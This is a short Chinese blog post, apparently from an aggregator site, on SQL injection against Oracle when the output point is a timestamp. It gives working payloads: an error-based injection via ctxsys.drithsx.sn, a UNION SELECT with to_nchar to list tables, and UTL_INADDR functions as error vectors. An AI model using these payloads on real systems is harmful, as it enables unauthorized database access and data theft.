当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
- vulhub靶场学习日记hackme2
- 剑指offer专项突击版 ---第 5 天
- [mysql improves query efficiency] Mysql database query is slow to solve the problem
- Proteus 8 Professional安装教程
- 运用flask框架发送短信验证码的流程及具体代码
- Goodbye to the cumbersome Excel, mastering data analysis and processing technology depends on it
- 账号或密码多次输入错误,进行账号封禁
- vulhub靶场学习日记SickOs1.2
- Object Detection Study Notes
- The TOKEN value of Kubernetes joining the cluster expires
猜你喜欢
leetcode-每日一题558. 四叉树交集(分治递归)
Goodbye to the cumbersome Excel, mastering data analysis and processing technology depends on it
【C语言3个基本结构详解——顺序、选择、循环】
leetcode-每日一题剑指 Offer II 041. 滑动窗口的平均值(队列模拟)
【JS面试题】面试官:“[1,2,3].map(parseInt)“ 输出结果是什么?答上来就算你通过面试
docker安装postgresSQL和设置自定义数据目录
12 【网页布局总结 元素的显示与隐藏】
详解扫雷游戏(C语言)
12 【nextTick 过渡与动画】
基于web3.0使用钱包Metamask的三方登陆
随机推荐
torch.normal function usage
leetcode-每日一题745. 前缀和后缀搜索(哈希和字典树)
Interviewer: If the order is not paid within 30 minutes, it will be automatically canceled. How to do this?
Kubernetes 证书可用年限修改
运用flask框架发送短信验证码的流程及具体代码
三子棋讲解(C语言)
初涉C语言
leetcode-每日一题735. 行星碰撞(栈模拟)
详解扫雷游戏(C语言)
torch.normal函数用法
vulhub靶场学习日记hackme1
Interview Redis High Reliability | Master-Slave Mode, Sentinel Mode, Cluster Cluster Mode
16 【打包上线 图片懒加载】
实验7 UDP与TCP对比
C语言教程(一)-准备
踏上编程之路,你必须要干的几件事
04 【计算属性 侦听属性】
Input length must be multiple of 8 when decrypting with padded cipher
剑指offer专项突击版 ---- 第 6 天
[MQ I can speak for an hour]